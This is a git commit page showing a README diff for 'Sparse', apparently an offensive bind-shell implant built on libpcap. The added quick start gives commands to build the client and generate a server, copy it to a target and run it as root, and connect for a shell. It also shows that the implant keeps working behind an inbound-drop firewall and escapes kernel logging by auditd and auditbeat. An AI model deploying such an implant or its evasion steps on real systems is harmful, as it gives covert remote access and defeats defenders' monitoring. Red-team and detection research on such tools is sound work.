docs: add a clearer quick start guide
This commit is contained in:
Andrew Rioux
parent
e267f282c6
commit
7a3f8dd803
GPG Key ID:
9B8BAC47C17ABB94
12
README.md
12
README.md
@ -15,4 +15,14 @@ This environment is designed to be developed in with a Nix developer shell, obta
|
|||||||
|
|
||||||
## Bind shell
|
## Bind shell
|
||||||
|
|
||||||
The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in [its appropriate folder](./sparse-05/README.md)
|
The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in [its appropriate folder](./sparse-05/README.md).
|
||||||
|
|
||||||
|
### Quick start:
|
||||||
|
|
||||||
|
- Install the Nix package manager on a Linux system: [https://nixos.org/download/]
|
||||||
|
- Run `nix --experimental-features 'nix-command flakes' build .#sparse-05-client`
|
||||||
|
- Generate a Linux server with `result/bin/sparse-05-client generate -t linux service-name`
|
||||||
|
- Copy to and run on a target system as root
|
||||||
|
- Connect to it with `result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248`
|
||||||
|
- Set up a firewall to block all inbound connections with `iptables -P INPUT DROP`, `iptables -F INPUT`; sparse should still be able to connect and operate
|
||||||
|
- Run `iptstate`, `auditbeat`, or `auditd` from another session to see that no IP or UDP traffic is being logged by the kernel
|
||||||
|
|||||||
@ -31,14 +31,12 @@ Sparse 0.5 weaponizes libpcap to both receive and send packets. It listens at th
|
|||||||
|
|
||||||
# Obtaining
|
# Obtaining
|
||||||
|
|
||||||
Sparse 0.5 is immediately ready to build from source if using the [Nix package manager](https://nixos.org/download) [with flakes enabled](https://nixos.wiki/wiki/Flakes) by running `nix build .#sparse-05-client`.
|
Sparse 0.5 is immediately ready to build from source if using the [Nix package manager](https://nixos.org/download) ([with flakes enabled](https://nixos.wiki/wiki/Flakes)) by running `nix build .#sparse-05-client`.
|
||||||
|
|
||||||
## FreeBSD support
|
## FreeBSD support
|
||||||
|
|
||||||
Building normally will only produce a client that can generate beacons for Linux and Windows, lacking proper FreeBSD support. To build the client with FreeBSD support, create a FreeBSD build environment by running `vagrant up` and compiling a FreeBSD sparse binary by running `sparse-build` or `sparse-build --release`. With the FreeBSD binary built, copy it from `target/x86_64-unknown-freebsd` to `sparse-05/sparse-05-freebsd-server`, and rebuild using Nix
|
Building normally will only produce a client that can generate beacons for Linux and Windows, lacking proper FreeBSD support. To build the client with FreeBSD support, create a FreeBSD build environment by running `vagrant up` and compiling a FreeBSD sparse binary by running `sparse-build` or `sparse-build --release`. With the FreeBSD binary built, copy it from `target/x86_64-unknown-freebsd` to `sparse-05/sparse-05-freebsd-server`, and rebuild using Nix
|
||||||
|
|
||||||
Currently, there are no prebuilt binaries. However, sparse can easily be built if the [Nix package manager](https://nixos.org/download) is installed. Just clone this repository and run `nix build .#sparse-05-client` and the client will be placed in `result/bin`.
|
|
||||||
|
|
||||||
# Use
|
# Use
|
||||||
|
|
||||||
Using sparse centers around the client. The client can generate new servers as well as the configuration file necessary to connect to the server, connect to a server for a shell, and verify the connection against a server.
|
Using sparse centers around the client. The client can generate new servers as well as the configuration file necessary to connect to the server, connect to a server for a shell, and verify the connection against a server.
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user